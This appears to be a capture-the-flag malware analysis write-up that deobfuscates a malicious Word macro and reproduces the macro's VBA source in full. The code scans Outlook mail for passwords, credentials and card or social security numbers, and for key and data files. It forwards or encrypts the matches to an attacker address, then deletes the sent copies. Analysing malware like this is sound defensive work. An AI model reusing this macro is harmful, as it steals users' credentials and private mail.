For egVlWScuJR = Asc("a") To Asc("z"): lxtmwrylodux(KLMydQnxMZSOX) = egVlWScuJR: KLMydQnxMZSOX = KLMydQnxMZSOX + 1: Next
For egVlWScuJR = Asc("0") To Asc("9"): lxtmwrylodux(KLMydQnxMZSOX) = egVlWScuJR: KLMydQnxMZSOX = KLMydQnxMZSOX + 1: Next
lxtmwrylodux(KLMydQnxMZSOX) = Asc("+"): KLMydQnxMZSOX = KLMydQnxMZSOX + 1
lxtmwrylodux(KLMydQnxMZSOX) = Asc("/"): KLMydQnxMZSOX = KLMydQnxMZSOX + 1
For KLMydQnxMZSOX = 0 To 127: djMloUrgDXwtHC(KLMydQnxMZSOX) = 255: Next
For KLMydQnxMZSOX = 0 To 63: djMloUrgDXwtHC(lxtmwrylodux(KLMydQnxMZSOX)) = KLMydQnxMZSOX: Next
SiTdrVDFDh = True
End Sub
Private Function dpoZtAIxbLpJPI(ByVal wjzTImaDJSRTu As String) As Byte()
Dim kXtArjueRudv() As Byte: kXtArjueRudv = wjzTImaDJSRTu
Dim bguIwEekiNS As Long: bguIwEekiNS = (UBound(kXtArjueRudv) + 1) \ 2
If bguIwEekiNS = 0 Then dpoZtAIxbLpJPI = kXtArjueRudv: Exit Function
Dim ZDfzccazGV() As Byte
ReDim ZDfzccazGV(0 To bguIwEekiNS - 1) As Byte
Dim adaOdggiLnYx As Long
For adaOdggiLnYx = 0 To bguIwEekiNS - 1
Dim egVlWScuJR As Long: egVlWScuJR = kXtArjueRudv(2 * adaOdggiLnYx) + 256 * CLng(kXtArjueRudv(2 * adaOdggiLnYx + 1))
If egVlWScuJR >= 256 Then egVlWScuJR = Asc("?")
ZDfzccazGV(adaOdggiLnYx) = egVlWScuJR
Next
dpoZtAIxbLpJPI = ZDfzccazGV
End Function
Private Function nkalPYSrDkoirG(JOaTlVhEgWePay As Variant, VkjJlLFzskbVY As Integer)
Dim fvPLOtDYqRXxu As String
Dim PjJHmvDBocr() As Byte
PjJHmvDBocr = ovLKcDvvuvaxVc(ActiveDocument.Variables("gtrxGyKtbDzUEDng"))
fvPLOtDYqRXxu = ""
For KLMydQnxMZSOX = LBound(JOaTlVhEgWePay) To UBound(JOaTlVhEgWePay)
fvPLOtDYqRXxu = fvPLOtDYqRXxu & Chr(PjJHmvDBocr(KLMydQnxMZSOX + VkjJlLFzskbVY) ^ JOaTlVhEgWePay(KLMydQnxMZSOX))
Next
nkalPYSrDkoirG = fvPLOtDYqRXxu
End Function
Stage 3 Analysis
Analysing the code, the function nkalPYSrDkoirG was used again and again with an array and an integer as its arguments. Looking at the function shows us that it is a simple XOR encryption. The first argument is the encrypted string and the second argument is the XOR key. However, the catch here is that whatever the integer provided in the second argument is used as an offset to determine where to start in the byte array PjJHmvDBocr. This byte array is derived from the function ovLKcDvvuvaxVc, which operates on a variable from the active document called gtrxGyKtbDzUEDng, likely representing the encryption key. Analysing the ovLKcDvvuvaxVc function with ChatGPT, it is determined that the function is a function to decode Base64 strings.
The function iterates through the encrypted array, performing an XOR operation between each byte of the encrypted data and a corresponding byte from PjJHmvDBocr, starting at the specified offset. This XOR operation decrypts each character, which is then concatenated into the result string fvPLOtDYqRXxu. Essentially, this means that the decryption key is applied with an adjustable starting point, which can vary the decrypted output depending on the offset provided. The function ultimately returns this decrypted string.
However, there is no active document variable defined anywhere and I didn't want to run this on my host seeing it as a malicious document. With that said, a .docm file is also a zip file, so unzipping the document gives us all the properties of the file.
The grep command allows us to find strings within files easily. The variable gtrxGyKtbDzUEDng is what we're trying to look for so by using the following command, it was able to find a Base64 string!
This is the complete Base64 string:
eNS7GlezU9snp3ciGjUJ9HD0eo5arrhaNii/Jgh7Rq38gvvpitv8AHreIuCHDbXhLd1BlLceamykizs8G02DzoP5bZm0PWZkL80S8MfgzZKkTAWqU3oSdton381J023oFIgmK5mEI4c+F85DAOx+mOkrnEbqMaOzJ4EQ4lSM2LfCgqS7AXQDbwipi5KrDBRkfKO8Me3+6MQ5g/XK6b6e2W5HvaCGoWDe6P2crp90G3GTh0kAemmwX1OOhX1IaAeKe8GbBiyp++2WTalzSf1vCviI5a+jcyRw26L8DP6i4urW+YP902QZa43DZ6A+d8Zh438OogAeuuBaNXUgPEgPQpQaca+NDHco7sYPzmI4Fb1XJU9SS1xGw1gU06x8vZ2w6u8oqnQN/xxTvGjxXUV+X9fnxUGQsg64B85ekF+DPeJD/92LHqrK2wVSVYgHGqvwKY/Yshfu9t2fl74o7KDTFATUJa1AHmy9zsNuZPvvwbwG9iD1cHFJLnLemhWN+6vMoQiO/xUIYMWKGQk2D8+RiSvhlptUw2195E3e7K40WnXNLSyAMvW+ngfplr9T23xyapsNo8gz/MOdw0KWMB868kW9kAGQ5IXWPHGaE7H8hWB3t+1K5H861yr7u5BgZIUby3VU0gKV8EH2c0Gl7rCa6sFbiTtCXmV3r1A+Fm3vBMCG19X2YPN62VpHhRMobsfSEl5TezlLWYVA/HNP6G5VX8+sxdTdQOyk84SGtm8I5Ss6kL4bs/+zw/VdcaXr8IZSa5rsmSgRC4+mLHhPSBTZODowjHPJOZK++rnkqLWQTzIRiiRZZVXeSoVEIGSla44WBR7x2xJABJrRzCxKUg+ryslthKXjteBuF9JZZovMADo9uRVgtu7XYVahg9ujIR310KWMMKlr+rzsLAvvlMLPHGVrG8LDoHrbURxqjPlU3a5OppL//jZIRKGTHO353w8HNR/ly3P3Nw==With this information, a simple Python script can be built to decrypt all the strings which used that function. So, again, I did this manually, going through each instance of nkalPYSrDkoirG. This will eventually allow us to read the script easily in Stage 4 of the analysis.
import base64
def decode_base64_string(encoded_string):
"""Decode a Base64 encoded string into a byte array."""
return base64.b64decode(encoded_string)
def xor_decrypt(byte_array, key_byte_array, offset):
"""Decrypt the byte array using XOR with a given key byte array and offset."""
decrypted_string = ""
for i in range(len(byte_array)):
# XOR the byte with the corresponding byte from the key array (with offset)
decrypted_byte = byte_array[i] ^ key_byte_array[i + offset]
# Convert the result to a character and add to the result string
decrypted_string += chr(decrypted_byte)
return decrypted_string
# Base64-encoded key stored in the document variable
base64_encoded_key = "eNS7GlezU9snp3ciGjUJ9HD0eo5arrhaNii/Jgh7Rq38gvvpitv8AHreIuCHDbXhLd1BlLceamykizs8G02DzoP5bZm0PWZkL80S8MfgzZKkTAWqU3oSdton381J023oFIgmK5mEI4c+F85DAOx+mOkrnEbqMaOzJ4EQ4lSM2LfCgqS7AXQDbwipi5KrDBRkfKO8Me3+6MQ5g/XK6b6e2W5HvaCGoWDe6P2crp90G3GTh0kAemmwX1OOhX1IaAeKe8GbBiyp++2WTalzSf1vCviI5a+jcyRw26L8DP6i4urW+YP902QZa43DZ6A+d8Zh438OogAeuuBaNXUgPEgPQpQaca+NDHco7sYPzmI4Fb1XJU9SS1xGw1gU06x8vZ2w6u8oqnQN/xxTvGjxXUV+X9fnxUGQsg64B85ekF+DPeJD/92LHqrK2wVSVYgHGqvwKY/Yshfu9t2fl74o7KDTFATUJa1AHmy9zsNuZPvvwbwG9iD1cHFJLnLemhWN+6vMoQiO/xUIYMWKGQk2D8+RiSvhlptUw2195E3e7K40WnXNLSyAMvW+ngfplr9T23xyapsNo8gz/MOdw0KWMB868kW9kAGQ5IXWPHGaE7H8hWB3t+1K5H861yr7u5BgZIUby3VU0gKV8EH2c0Gl7rCa6sFbiTtCXmV3r1A+Fm3vBMCG19X2YPN62VpHhRMobsfSEl5TezlLWYVA/HNP6G5VX8+sxdTdQOyk84SGtm8I5Ss6kL4bs/+zw/VdcaXr8IZSa5rsmSgRC4+mLHhPSBTZODowjHPJOZK++rnkqLWQTzIRiiRZZVXeSoVEIGSla44WBR7x2xJABJrRzCxKUg+ryslthKXjteBuF9JZZovMADo9uRVgtu7XYVahg9ujIR310KWMMKlr+rzsLAvvlMLPHGVrG8LDoHrbURxqjPlU3a5OppL//jZIRKGTHO353w8HNR/ly3P3Nw=="
# Decode the Base64 string to get the key byte array
key_byte_array = decode_base64_string(base64_encoded_key)
# List of encrypted byte arrays and their corresponding offsets
encrypted_data = [
(bytearray([<INSERT_ARRAY_HERE>]), <INSERT_OFFSET_HERE>)
]
# Decrypt each byte array and print the result
decrypted_message = ""
for byte_array, offset in encrypted_data:
decrypted_string = xor_decrypt(byte_array, key_byte_array, offset)
decrypted_message += decrypted_string
print("Decrypted message:", decrypted_message)
Stage 4 Analysis
Stage 4 of the analysis involves renaming the functions and variable names. For this, ChatGPT was used. However, only some of the function names and variable names were changed as at some point, I knew what the script did.
Const exfil_address As String = "dph@whschool.com"
Private IsInitialized As Boolean
Private lxtmwrylodux(0 To 63) As Byte
Private DecodeBase64Char(0 To 127) As Byte
Function FVaFfsygaGuUBB(JulhxRTJAtZ)
Dim atBjGMlxGDau As Variant
Dim IsNslKdUSos As Long
Dim ULDvZWynDzG As String
' abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*ABCDEFGHIJKLMNOPQRSTUVWXYZ
atBjGMlxGDau = Array(
DecryptData(Array(17), 16),
DecryptData(Array(150), 17),
DecryptData(Array(25), 18),
DecryptData(Array(234), 19),
DecryptData(Array(63), 20),
DecryptData(Array(200), 21),
DecryptData(Array(223), 22),
DecryptData(Array(50), 23),
DecryptData(Array(95), 24),
DecryptData(Array(66), 25),
DecryptData(Array(212), 26),
DecryptData(Array(74), 27),
DecryptData(Array(101), 28),
DecryptData(Array(21), 29),
DecryptData(Array(41), 30),
DecryptData(Array(221), 31),
DecryptData(Array(141), 32),
DecryptData(Array(240), 33),
DecryptData(Array(136), 34),
DecryptData(Array(157), 35),
DecryptData(Array(255), 36),
DecryptData(Array(173), 37),
DecryptData(Array(139), 38),
DecryptData(Array(120), 39),
DecryptData(Array(3), 40),
DecryptData(Array(164), 41),
DecryptData(Array(18), 42),
DecryptData(Array(209), 43),
DecryptData(Array(181), 44),
DecryptData(Array(62), 45),
DecryptData(Array(129), 46),
DecryptData(Array(212), 47),
DecryptData(Array(27), 48),
DecryptData(Array(234),49),
DecryptData(Array(121), 50),
DecryptData(Array(173), 51),
DecryptData(Array(150), 52),
DecryptData(Array(94), 53),
DecryptData(Array(73), 54),
DecryptData(Array(72), 55),
DecryptData(Array(129), 56),
DecryptData(Array(213), 57),
DecryptData(Array(29), 58),
DecryptData(Array(22), 59),
DecryptData(Array(90), 60),
DecryptData(Array(15), 61),
DecryptData(Array(192), 62),
DecryptData(Array(138), 63),
DecryptData(Array(198), 64),
DecryptData(Array(191), 65),
DecryptData(Array(42), 66),
DecryptData(Array(209), 67),
DecryptData(Array(253), 68),
DecryptData(Array(119), 69),
DecryptData(Array(45), 70),
DecryptData(Array(40), 71),
DecryptData(Array(98), 72),
DecryptData(Array(131), 73),
DecryptData(Array(93), 74),
DecryptData(Array(160), 75),
DecryptData(Array(150), 76),
DecryptData(Array(178),77),
DecryptData(Array(158), 78),
DecryptData(Array(198), 79),
DecryptData(Array(241), 80),
DecryptData(Array(26), 81),
DecryptData(Array(82), 82),
DecryptData(Array(242), 83),
DecryptData(Array(10), 84),
DecryptData(Array(32), 85))
For IsNslKdUSos = 1 To JulhxRTJAtZ
Randomize
ULDvZWynDzG = ULDvZWynDzG & atBjGMlxGDau(Int((UBound(atBjGMlxGDau) - LBound(atBjGMlxGDau) + 1) * Rnd + LBound(atBjGMlxGDau)))
Next IsNslKdUSos
FVaFfsygaGuUBB = ULDvZWynDzG
End Function
Function MTDPxqUeBtnHy(QvXdgzREtgivJc, MJAnPLmDOHCpM)
MTDPxqUeBtnHy = QvXdgzREtgivJc
If MJAnPLmDOHCpM < QvXdgzREtgivJc Then MTDPxqUeBtnHy = MJAnPLmDOHCpM
End Function
Function ConvertToBase64(NfZjOnhlizlg)
Dim BPFDRGiTpeffVc As String
Dim IxqNKATnfrjL() As Byte
Dim PIBNxhGCNMURDD As Object
Dim utf8Encoding As Object
Dim xothlNMzDN, JulhxRTJAtZ, BlockSize As Integer
' System.Security.Cryptography.ToBase64Transform
Set PIBNxhGCNMURDD = CreateObject(
DecryptData(Array(65, 15, 169, 83, 186), 86) &
DecryptData(Array(160, 103, 128, 8, 139, 97, 250, 79, 95, 224, 170, 96, 245, 71, 103, 186, 44, 103, 158, 31, 232, 129, 82, 178, 18, 133, 115, 194, 192, 66, 183, 36, 182, 38, 237, 182, 196, 164, 237, 214, 214), 91))
' System.Text.UTF8Encoding
Set utf8Encoding = CreateObject(
DecryptData(Array(82, 13, 112, 27, 109, 196, 165, 198, 206, 116, 96, 74, 41, 247, 250), 132) &
DecryptData(Array(9, 168, 144, 139, 171, 93, 234, 155, 173), 147))
BlockSize = PIBNxhGCNMURDD.InputBlockSize
For xothlNMzDN = 0 To LenB(NfZjOnhlizlg) - 1 Step BlockSize
JulhxRTJAtZ = MTDPxqUeBtnHy(BlockSize, UBound(NfZjOnhlizlg) - xothlNMzDN)
IxqNKATnfrjL = PIBNxhGCNMURDD.TransformFinalBlock((NfZjOnhlizlg), xothlNMzDN, JulhxRTJAtZ)
BPFDRGiTpeffVc = BPFDRGiTpeffVc & utf8Encoding.GetString((IxqNKATnfrjL))
Next
ConvertToBase64 = BPFDRGiTpeffVc
End Function
Function uEfmNHGlYFaj(qcGjVkReTg)
Dim utf8Encoding As Object
Dim NfZjOnhlizlg() As Byte
Dim ScMpMxoqdQ As Object
' System.Text.UTF8Encoding
Set utf8Encoding = CreateObject(
DecryptData(Array(186, 199, 237, 173, 11), 156) &
DecryptData(Array(42, 147, 244, 227, 217, 20, 240, 189, 169, 218, 150, 218, 26, 120, 30, 247, 238, 39, 103), 161))
' System.Security.Cryptography.FromBase64Transform
Set ScMpMxoqdQ = CreateObject(
DecryptData(Array(41, 16, 195, 43, 54, 227, 171, 46, 45, 11, 114, 248, 18, 181, 226, 40, 111, 219, 130, 157, 226, 34, 206, 1, 40, 141, 7, 115, 214, 206, 151, 192, 206, 49, 69), 180) &
DecryptData(Array(3, 190, 148, 200, 88, 140, 195, 140, 153, 176, 150, 241, 144), 215))
NfZjOnhlizlg = utf8Encoding.GetBytes_4(qcGjVkReTg)
uEfmNHGlYFaj = ScMpMxoqdQ.TransformFinalBlock((NfZjOnhlizlg), 0, UBound(NfZjOnhlizlg))
End Function
Function EncryptData(inputString)
Dim encryptedData, byteArray, encryptedBytes, keyBytes() As Byte
Dim saltString As String
saltString = FVaFfsygaGuUBB(32)
Dim utf8Encoding, rijndael, zrjycZwtKFJvAu, IVdDfkxSWPOTi As Object
Dim kSNpGaWBeFRbpl() As Byte
' System.Security.Cryptography.RijndaelManaged
Set rijndael = CreateObject(
DecryptData(Array(128, 29, 106, 31, 232, 174, 73, 243, 91, 20, 179, 19), 228) &
DecryptData(Array(138, 11, 119, 140, 67, 108, 195, 144, 46, 90, 18, 82, 93, 56, 103, 59, 186, 72, 24, 197, 227, 104, 22, 77, 130, 139, 110, 160, 3, 95, 112, 217), 240)
)
' System.Text.UTF8Encoding
Set utf8Encoding = CreateObject(
DecryptData(Array(4, 92, 60, 38, 46, 49, 104, 151, 61, 108, 167, 130, 41, 233, 219, 136, 175, 129, 75, 197, 16, 100), 272) &
DecryptData(Array(145, 123), 294)
)
rijndael.KeySize = 256
rijndael.BlockSize = 256
rijndael.Mode = (1 + 0)
' System.Text.UTF8Encoding
' 8xppg2oX68Bo6koL7hwSeC8bCEWvk540
rijndael.Key = CreateObject(
DecryptData(Array(0, 197, 27, 133, 56, 40, 80, 11, 178, 159, 177, 111, 197, 230, 72, 128, 66), 296) &
DecryptData(Array(160, 61, 255, 59, 234, 83, 133), 313)).GetBytes_4(
DecryptData(Array(123, 135, 173, 251, 121, 152, 165, 131, 51, 106, 23, 231, 49, 113, 196, 188, 30, 231, 175, 225, 114, 173, 206, 191, 220, 210, 233, 94, 135), 320) &
DecryptData(Array(149, 231, 36), 349)
)
' System.Text.UTF8Encoding
rijndael.IV = CreateObject(
DecryptData(Array(87, 173, 86, 217, 37, 115, 66, 233, 171, 187, 26), 352) &
DecryptData(Array(74, 174, 187, 135, 132, 67, 152, 67, 154, 20, 24, 39, 73), 363)).GetBytes_4(saltString)
' System.Text.UTF8Encoding
keyBytes = CreateObject(
DecryptData(Array(33, 167, 233, 97, 232, 150, 133, 152, 196, 112, 250, 209, 64, 92, 38, 253, 207, 119), 376) &
DecryptData(Array(106, 89, 107, 166, 255, 238), 394)).GetBytes_4(inputString)
encryptedData = rijndael.CreateEncryptor().TransformFinalBlock((keyBytes), 0, UBound(keyBytes))
' |
EncryptData = saltString & DecryptData(Array(87), 400) & ConvertToBase64(encryptedData)
End Function
Sub ProcessOutlookEmails()
Dim sensitiveKeywords
sensitiveKeywords = Array(
' password
DecryptData(Array(145, 247, 232, 39, 180, 2, 15), 401) &
DecryptData(Array(128), 408),
' passwd
DecryptData(Array(61, 191, 159, 221, 67, 62), 409),
' creds
DecryptData(Array(22, 191, 72, 72, 243), 415),
' credential
DecryptData(Array(81, 135, 219, 250, 98, 135, 226, 214, 50), 420) &
DecryptData(Array(183), 429),
' credit card
DecryptData(Array(31, 0, 15, 255, 100), 430) &
DecryptData(Array(215, 232, 80, 157, 177, 249), 435),
' creditcard
DecryptData(Array(160, 48, 243, 84, 118, 78), 441) &
DecryptData(Array(145, 36, 207, 244), 447),
' social security number
DecryptData(Array(114, 255, 135, 236, 183), 451) &
DecryptData(Array(80, 81, 233, 118, 210, 137, 247, 9, 3, 206, 205, 36, 145, 18, 88, 178, 88), 456)
)
Dim fileTypes
fileTypes = Array(
' pgp
DecryptData(Array(36, 181, 114), 482),
' asc
DecryptData(Array(244, 131, 34), 485),
' pem
DecryptData(Array(134, 22, 44), 488),
' pub
DecryptData(Array(213, 155, 210), 491),
' gpg
DecryptData(Array(253, 154, 166), 494),
' gpg-key
DecryptData(Array(60, 249), 497) &
DecryptData(Array(92, 111, 53, 0, 14), 499),
' mp3
DecryptData(Array(194, 32, 13), 504),
' mp4
DecryptData(Array(123, 29, 219), 507),
' mov
DecryptData(Array(105, 175, 240), 510),
' xlsx
DecryptData(Array(175, 185, 133, 24), 513),
' xlsm
DecryptData(Array(139, 22, 170, 55), 517),
' xlsb
DecryptData(Array(63, 233, 96, 74), 521),
' csv
DecryptData(Array(13, 180, 164), 525),
' doc
DecryptData(Array(118, 49, 48), 528),
' docx
DecryptData(Array(31, 86, 40, 33), 531),
' docm
DecryptData(Array(225, 47, 159, 30), 535),
' exe
DecryptData(Array(42, 144, 11), 539),
' zip
DecryptData(Array(47, 54, 191), 542),
' sql
DecryptData(Array(223, 180, 184), 545),
' db
DecryptData(Array(185, 34), 548),
' bak
DecryptData(Array(142, 197, 152), 550),
' pgf
DecryptData(Array(244, 225, 208), 553)
)
Dim outlookApp As Object
Dim XstsppFkvZr As Object
Dim emailBody As String
Dim outlookNamespace As Object
Dim emailAttachments As Object
' Outlook.Application
Set outlookApp = CreateObject(
DecryptData(Array(32, 125, 145, 71, 85, 255, 213, 53, 242, 143), 556) &
DecryptData(Array(195, 175, 156, 62, 16, 209, 130, 159, 232), 566)
)
' MAPI
Set outlookNamespace = outlookApp.GetNamespace(DecryptData(Array(31, 42, 202, 165), 575))
Set emailAttachments = outlookNamespace.GetDefaultFolder(6).Items
Dim index As Integer
Dim containsSensitiveInfo As Boolean
containsSensitiveInfo = False
Dim attachmentContainsSensitiveInfo As Boolean
attachmentContainsSensitiveInfo = False
Dim startDate As Date
Dim endDate As Date
Const daysToSearch As Integer = 400
startDate = Date - daysToSearch
endDate = Date
Dim emailItem As Object
For Each emailItem In emailAttachments
If emailItem.ReceivedTime >= startDate And emailItem.ReceivedTime <= endDate Then
containsSensitiveInfo = CheckForSensitiveInfo(emailItem.body, emailItem.Subject, sensitiveKeywords)
If containsSensitiveInfo Then
Call ProcessSensitiveEmail(emailItem.body, emailItem.Subject)
End If
If emailItem.Attachments.Count > 0 Then
Dim i As Integer
For i = 1 To emailItem.Attachments.Count
attachmentContainsSensitiveInfo = CheckAttachmentForSensitiveInfo(emailItem.Attachments.Item(i), fileTypes, sensitiveKeywords)
If attachmentContainsSensitiveInfo Then
Call HandleSensitiveAttachment(emailItem, emailItem.Subject)
End If
Next
End If
End If
Next
Set emailAttachments = Nothing
Set outlookApp = Nothing
End Sub
Sub ProcessSensitiveEmail(IehgfWzjBPM As String, gjQiIlwvaI As String)
Dim outlookApp As Object
Dim XstsppFkvZr As Object
Dim emDROsRKEd As String
' Outlook.Application
Set outlookApp = CreateObject(
DecryptData(Array(214, 93, 101, 103, 224, 201, 71, 86, 14), 579) &
DecryptData(Array(56, 100, 181, 81, 89, 81, 248, 26, 166, 87), 588))
Set XstsppFkvZr = outlookApp.CreateItem(0)
emDROsRKEd = IehgfWzjBPM
On Error Resume Next
With XstsppFkvZr
.To = exfil_address
.CC = DecryptData(Array(), 614)
.BCC = DecryptData(Array(), 614)
' Outlook Efiltration Data from User:
.Subject = DecryptData(Array(145, 63, 241, 40, 79, 11, 206, 75, 203, 10, 99, 119, 157, 175, 96, 33, 112, 243, 190, 162, 12, 14, 51, 123, 202, 234, 175, 31, 235, 200, 195, 224, 147, 11), 614) &
DecryptData(Array(101, 232, 121), 648) &
' username
Environ(
DecryptData(Array(19, 248), 651) &
DecryptData(Array(169, 114, 84, 92, 212, 112), 653)
)
.body = EncryptData(gjQiIlwvaI & emDROsRKEd)
.DeleteAfterSubmit = True
.Send
End With
On Error GoTo 0
Set XstsppFkvZr = Nothing
Set outlookApp = Nothing
End Sub
Sub HandleSensitiveAttachment(QmmdKXwuMa As Variant, gjQiIlwvaI As String)
Dim XstsppFkvZr As Object
Set XstsppFkvZr = QmmdKXwuMa.Forward
On Error Resume Next
With XstsppFkvZr
.To = exfil_address
.CC = DecryptData(Array(), 675)
.BCC = DecryptData(Array(), 675)
' Outlook Exfiltration At~achment from User:
.Subject = DecryptData(Array(127, 220, 31, 150, 211, 131, 71, 43, 170, 236, 164, 166, 112, 17, 25, 122, 182, 170, 207, 20, 251, 16, 104, 20, 237, 154, 60, 176, 203, 32, 210, 178, 153, 140, 89, 37, 100, 244, 224), 675) &
DecryptData(Array(121, 159, 195, 255), 714) &
' username
Environ(DecryptData(Array(122, 116, 80, 109, 139, 170, 30), 718) &
DecryptData(Array(146), 725))
.DeleteAfterSubmit = True
.Send
End With
On Error GoTo 0
Set XstsppFkvZr = Nothing
End Sub
Public Function CheckForSensitiveInfo(IehgfWzjBPM As String, gjQiIlwvaI As String, sensitiveKeywords As Variant) As Boolean
CheckForSensitiveInfo = False
Dim YXeXnGWwCIuAtn As Variant
For Each YXeXnGWwCIuAtn In sensitiveKeywords
If (InStr(1, UCase(IehgfWzjBPM), YXeXnGWwCIuAtn, vbTextCompare) > 0) Or (InStr(1, UCase(gjQiIlwvaI), YXeXnGWwCIuAtn, vbTextCompare) > 0) Then
CheckForSensitiveInfo = True
Exit For
Else
CheckForSensitiveInfo = False
End If
Next
End Function
Public Function CheckAttachmentForSensitiveInfo(OFTngrKtymtIs As Variant, fileTypes As Variant, sensitiveKeywords As Variant) As Boolean
CheckAttachmentForSensitiveInfo = False
Dim sBtphCWmicZ As Boolean
sBtphCWmicZ = False
Dim FSvAGmBKEpy As Boolean
FSvAGmBKEpy = False
Dim KfBAtqXWVPbl As String
Dim tFWjedYCFp As String
KfBAtqXWVPbl = OFTngrKtymtIs.FileName
' .
tFWjedYCFp = Split(KfBAtqXWVPbl, DecryptData(Array(25), 726))1
Dim dPjnuzlcUPVn As Variant
For Each dPjnuzlcUPVn In fileTypes
If (InStr(1, UCase(tFWjedYCFp), dPjnuzlcUPVn, vbTextCompare) > 0) Then
sBtphCWmicZ = True
Else
sBtphCWmicZ = False
End If
Next
Dim YXeXnGWwCIuAtn As Variant
For Each YXeXnGWwCIuAtn In sensitiveKeywords
If (InStr(1, UCase(KfBAtqXWVPbl), YXeXnGWwCIuAtn, vbTextCompare) > 0) Then
FSvAGmBKEpy = True
Else
FSvAGmBKEpy = False
End If
Next
If sBtphCWmicZ Or FSvAGmBKEpy Then
CheckAttachmentForSensitiveInfo = True
Else
CheckAttachmentForSensitiveInfo = False
End If
End Function
Public Function DecodeBase64(ByVal inputString As String) As Byte()
If Not IsInitialized Then InitializeDecoder
Dim encodedBytes() As Byte: encodedBytes = TransformStringToByteArray(inputString)
Dim encodedLength As Long: encodedLength = UBound(encodedBytes) + 1
' Ensure the length of the encoded byte array is a multiple of 4
If encodedLength Mod 4 <> 0 Then Err.Raise vbObjectError, , "Invalid Base64 string length"
' Adjust length to remove padding characters
Do While encodedLength > 0
If encodedBytes(encodedLength - 1) <> Asc("=") Then Exit Do
encodedLength = encodedLength - 1
Loop
Dim decodedLength As Long: decodedLength = (encodedLength * 3) \ 4
Dim decodedBytes() As Byte
ReDim decodedBytes(0 To decodedLength - 1) As Byte
Dim inputIndex As Long
Dim outputIndex As Long
Do While inputIndex < encodedLength
Dim byte1 As Byte: byte1 = encodedBytes(inputIndex): inputIndex = inputIndex + 1
Dim byte2 As Byte: byte2 = encodedBytes(inputIndex): inputIndex = inputIndex + 1
Dim byte3 As Byte: If inputIndex < encodedLength Then byte3 = encodedBytes(inputIndex): inputIndex = inputIndex + 1 Else byte3 = Asc("A")
Dim byte4 As Byte: If inputIndex < encodedLength Then byte4 = encodedBytes(inputIndex): inputIndex = inputIndex + 1 Else byte4 = Asc("A")
' Raise an error if any byte is outside the ASCII range
If byte1 > 127 Or byte2 > 127 Or byte3 > 127 Or byte4 > 127 Then
Err.Raise vbObjectError, , "Invalid Base64 characters"
End If
Dim value1 As Byte: value1 = DecodeBase64Char(byte1)
Dim value2 As Byte: value2 = DecodeBase64Char(byte2)
Dim value3 As Byte: value3 = DecodeBase64Char(byte3)
Dim value4 As Byte: value4 = DecodeBase64Char(byte4)
' Raise an error if any decoded value is outside the Base64 range
If value1 > 63 Or value2 > 63 Or value3 > 63 Or value4 > 63 Then _
Err.Raise vbObjectError, , "Invalid Base64 values"
Dim decodedByte1 As Byte: decodedByte1 = (value1 * 4) Or (value2 \ &H10)
Dim decodedByte2 As Byte: decodedByte2 = ((value2 And &HF) * &H10) Or (value3 \ 4)
Dim decodedByte3 As Byte: decodedByte3 = ((value3 And 3) * &H40) Or value4
decodedBytes(outputIndex) = decodedByte1: outputIndex = outputIndex + 1
If outputIndex < decodedLength Then decodedBytes(outputIndex) = decodedByte2: outputIndex = outputIndex + 1
If outputIndex < decodedLength Then decodedBytes(outputIndex) = decodedByte3: outputIndex = outputIndex + 1
Loop
DecodeBase64 = decodedBytes
End Function
Private Sub InitializeDecoder()
Dim combinedValue As Integer, index As Integer
index = 0
For combinedValue = Asc("A") To Asc("Z"): lxtmwrylodux(index) = combinedValue: index = index + 1: Next
For combinedValue = Asc("a") To Asc("z"): lxtmwrylodux(index) = combinedValue: index = index + 1: Next
For combinedValue = Asc("0") To Asc("9"): lxtmwrylodux(index) = combinedValue: index = index + 1: Next
lxtmwrylodux(index) = Asc("+"): index = index + 1
lxtmwrylodux(index) = Asc("/"): index = index + 1
For index = 0 To 127: DecodeBase64Char(index) = 255: Next
For index = 0 To 63: DecodeBase64Char(lxtmwrylodux(index)) = index: Next
IsInitialized = True
End Sub
Private Function TransformStringToByteArray(ByVal inputString As String) As Byte()
Dim inputBytes() As Byte: inputBytes = inputString
Dim halfLength As Long: halfLength = (UBound(inputBytes) + 1) \ 2
If halfLength = 0 Then
TransformStringToByteArray = inputBytes
Exit Function
End If
Dim resultBytes() As Byte
ReDim resultBytes(0 To halfLength - 1) As Byte
Dim i As Long
For i = 0 To halfLength - 1
Dim combinedValue As Long
combinedValue = inputBytes(2 * i) + 256 * CLng(inputBytes(2 * i + 1))
If combinedValue >= 256 Then
combinedValue = Asc("?")
End If
resultBytes(i) = combinedValue
Next
TransformStringToByteArray = resultBytes
End Function
Private Function DecryptData(encryptedData As Variant, offest As Integer)
Dim decryptedString As String
Dim base64DecodedBytes() As Byte
base64DecodedBytes = DecodeBase64(ActiveDocument.Variables("gtrxGyKtbDzUEDng"))
decryptedString = ""
For index = LBound(encryptedData) To UBound(encryptedData)
decryptedString = decryptedString & Chr(base64DecodedBytes(index + offest) ^ encryptedData(index))
Next
DecryptData = decryptedString
End Function
So, the attack flow is as follows:
It starts from the
ProcessOutlookEmails()function where the script will go through Outlook emails from the last 400 days and look for sensitive words and sensitive files from the emails.If it manages to find any sensitive files, it will then forward that email to the attacker with the email "dph@whschool.com". It will then delete that email from the user's records.
If it manages to find any sensitive words within the email, it will create a new email and call the
EncryptData()function with the email's subject and the email's body which is joined together as one string as the argument and whatever theEncryptData()function returns will be sent to the attacker with the email "dph@whschool.com". It will then delete that email from the user's records.The
EncryptData()function will callFVaFfsygaGuUBB()to generate a random 32-byte IV. It will then create an Object which will use the Rijndael encryption method. It will then use a hard-coded key to encrypt whatever the function wants to encrypt.However, the
EncryptData()function does not encrypt the input string that is provided to it. Instead, it returns the IV and the supposedly encrypted flag which is separated by "|" .
Decrypting the Flag
Looking at mail.txt shows what we have previously analysed.
From: Austin <taustin@whschool.com>
To: dph@whschool.com
Subject: Outlook Exfiltration Data from User: taustin
*twGsy*#p7XY8CT4N3RpGq5xDzL7EMHW|MZgInjVQiig/Ce4mInU3xVamChLH3kT4ME1JJ9YEHJuCFLa1Zfg+I5d2h5j1QkGwNj237XLiaBtzkualk2WiJg==First of all, AES is a United States federal standard, FIPS 197, which is a subset of Rijndael:
AES has a fixed block size of 128 bits and a key size of 128, 192, or 256 bits, whereas Rijndael can be specified with block and key sizes in any multiple of 32 bits, with a minimum of 128 bits and a maximum of 256 bits.
The VBA script that we have just analysed seems to be at first glance, an AES encryption when I first analysed it. However, as stated before, it uses the Rijndael encryption method which is similar to AES but not. Having that said, CyberChef does not have a recipe for Rijndael encryption so a third party is used.
